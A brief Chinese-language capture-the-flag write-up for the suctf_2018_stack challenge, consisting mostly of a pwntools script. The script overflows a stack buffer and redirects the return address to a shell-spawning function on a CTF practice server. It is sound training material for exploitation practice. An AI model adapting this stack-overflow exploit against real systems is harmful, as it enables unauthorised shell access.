suctf_2018_stack
查看保护
ret2text即可。这里笔者打远程的时候失败,看了一下是18的,所以地址往后移了一下
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 27552)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
shell = 0x40067A
p1 = b'a' * (0x20 + 8) + p64(shell)
r.sendline(p1)
r.interactive()